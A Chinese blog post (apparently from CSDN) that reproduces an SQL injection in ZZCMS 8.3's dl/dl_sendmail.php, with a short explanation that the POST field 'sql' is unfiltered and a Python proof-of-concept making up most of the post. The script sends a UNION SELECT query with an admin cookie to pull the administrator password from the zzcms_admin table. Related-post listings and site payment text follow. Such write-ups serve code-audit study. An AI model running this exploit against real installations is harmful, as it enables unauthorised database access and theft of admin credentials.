ZZCMS8.3 dl/dl_sendmail.php SQL注入

最新推荐文章于 2024-04-30 11:29:45 发布
最新推荐文章于 2024-04-30 11:29:45 发布
阅读量3.9k 收藏
点赞数
文章标签: ZZCMS
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42813492/article/details/81240523
版权

一、 源代码分析
先来看一下源代码,漏洞位置位于
dl/dl_sendmail.php 第74行
这里写图片描述
根据代码可知SQL语句为post提交,中间并未进行过过滤,因此此处存在SQL注入

二、 复现步骤
POC如下:

import requests

url = "http://10.10.10.39:8080/dl/dl_sendmail.php"
cookies = {'UserName':'admin','PassWord':'21232f297a57a5a743894a0e4a801fc3'}
data = { 'sql':'select email from zzcms_dl where id=-1 union select pass from zzcms_admin #'}

q = requests.post(url,data,cookies=cookies)
q.encoding = 'utf-8'
print q.text

可以看到成功获得管理员密码
这里写图片描述

AvaterXXX
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
zzcms8.3.zip
08-26
学习代码审计的源码,也可以用来学习PHP架构,等等.....
ZZCMS漏洞复现和代码审计
qq_48511129的博客
01-25 6812
ZZCMS漏洞复现和代码审计
zzcms审计-另类的漏洞
最新发布
2301_80127209的博客
04-30 239
ZZCMS是专门帮助企业建立招商系统的一个CMS,此次出现问题的是ZZCMS201910和zzcms2020这两个版本(其他的版本我还没有具体去看),此cms的官网为http://www.zzcms.net/他这里最根本的原因就是利用cookie去获取要删除的数据表,却没有对用户可以传入的数据表名字进行限制,这样就导致了可以删除随便哪一张表,只要这个数据表里面含有id这个字段。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。二、漏洞发现过程分析。
zzcms靶场搭建
Gjqhs的博客
03-03 1410
zzcms8.2需要把install.lock文件删除了,安装 可能不一样,自行删改 http://127.0.0.1/zzcms/install/index.php
ZZCMS代码审计
weixin_55967300的博客
02-16 297
代码审计
(代码审计)zzcms前台SQL注入
Cobra的博客
04-20 585
代码审计
ZZCMS审计(XSS)
杨同学的博客
12-10 429
php代码审计
[CMS程序]zzcms网站管理系统 1.0 Build 090831_zzcms.zip
03-21
9. **安全防护**: 安全是任何CMS的重要考虑因素,zzcms可能会有定期的安全更新,以防止SQL注入、XSS攻击等常见的网络安全威胁。 10. **更新与维护**: 随着时间推移,开发者会发布新的补丁和更新,修复已知问题,...
[CMS程序]zzcms网站管理系统 1.0 Build 090831_zzcms.rar
04-18
包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。【适用人群】:适用...
Ares-X#VulWiki#(CVE-2018-14961)Zzcms 8.3 前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
zzcms_v8.1.rar
03-12
在这个过程中,测试人员会尝试利用各种方法,包括但不限于SQL注入、跨站脚本(XSS)、文件包含漏洞、命令注入等,来检测系统的脆弱性。针对zzcms_v8.1,渗透测试人员会仔细审查源代码,寻找可能导致安全风险的环节。...
zzcms83代码审计练习
10-24
提供刚刚学习代码审计的同学一起学习,其实也没有什么好说的,由于市面上比较难找,这里提供给大家方便下载,版本是8.3的。
zzcms轻量级企业网站管理系统v1.0beta
08-06
本程序是一款轻量级企业网站管理系统,基于PHP Mysql架构,可运行在Linux、Windows等各种平台上,系统搭载Smarty模板引擎,支持伪静态。 后端使用Smarty框架,MVC模式。 前端使用响应式HTML5 DIV CSS框架,兼容IE6等各种版本浏览器,可拓展可视化布局 功能: 1:文章模块、单页面模块、产品模块、订单模块、招聘模块、下载模块、图库模块、友情链接模块、在线留言评论模
zzcms2019.zip
08-22
可用来代码审计,或者网站搭建,或者PHP代码学习网站搭建
zzcms,招商网cms,专业做招商网,zzcms专业做招商网zzcms201910.zip
01-15
ZZCMS 用项目加盟型模板,可快速搭建像 jiameng.com项目加盟网,u88.com,3158.cn,28.com,78.cn 等这种类型的商机网,致富网的程序、源码。
ZZCMS搭建
weixin_53323333的博客
06-22 592
4.傻瓜式下一步。
ZZCMS201910代码审计
ztK63LrD的博客
09-11 3284
现在开始分析zzcms中 产生sql注入的原理以及代码审计的过程。先用seay审计大概过一遍此cms中可能存在的漏洞,然后在admin/ask.php的文件看到这个可能存在漏洞的点,这里的sql语句中$_COOKIE["askbigclassid"]这个参数可控,此时就有一个想法我是不是可以将我所想查询的内容通过构造特殊的sql语句插入到这个变量中,进行自己想查询的东西,这里是不是就完成了一个sql注入攻击。
代码审计轻松拿下CNVD证书
weixin_43460070的博客
04-21 1610
CSU小学弟终于在前些日子拿到了自己的第一个CNVD证书,写此文章留作纪念 一、版本及官网概述 ZZCMS是专门帮助企业建立招商系统的一个CMS,此次出现问题的是ZZCMS201910和zzcms2020这两个版本(其他的版本我还没有具体去看),此cms的官网为http://www.zzcms.net/ 在admin目录下的tag.php出现了漏洞 二、漏洞发现过程分析 Tag.php 38-62行 67-77行 我们传入相应的参数直接进入showtag这个方法里面 接下来开始分析showtag()这
zzcms靶场测试
喜欢创作各种技术类文章,希望可以帮到你
01-23 1647
(1)过滤输入的数据,对例如:“ ‘ ”,“ “ ”,” “,” on* “,script、iframe等危险字符进行严格的检查。对输出的数据也要检查,数据库里的值有可能会在一个大网站的多处都有输出,即使在输入做了编码等操作,在各处的输出点时也要进行检查。为了应对这些潜在的风险,企业应采取一系列的安全措施,包括但不限于更新软件至最新的安全补丁版本、加强内部管理和加密敏感信息,同时建立和完善安全策略和措施,并进行定期的安全检查和测试。(3)不仅在客户端做数据的验证与过滤,关键的过滤步骤在服务端进行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值